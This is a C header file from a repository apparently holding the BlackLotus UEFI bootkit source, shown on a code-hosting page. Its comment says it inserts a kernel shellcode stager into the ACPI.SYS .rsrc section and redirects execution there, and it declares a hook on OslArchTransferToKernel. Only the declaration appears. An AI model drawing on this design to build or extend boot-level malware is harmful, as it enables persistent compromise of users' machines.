BlackLotus/src/Bootkit/OslArchTransferToKernel.h

12 lines
237 B
C
Raw Normal View History

2023-07-12 16:43:04 -07:00
#pragma once
/*!
*
* Purpose:
*
* Inserts a kernel shellcode stager into ACPI.SYS
* .rsrc section, and directs execution to it.
*
!*/
D_SEC( B ) VOID EFIAPI OslArchTransferToKernelHook( _In_ PVOID LoaderBlock, _In_ PVOID Entry );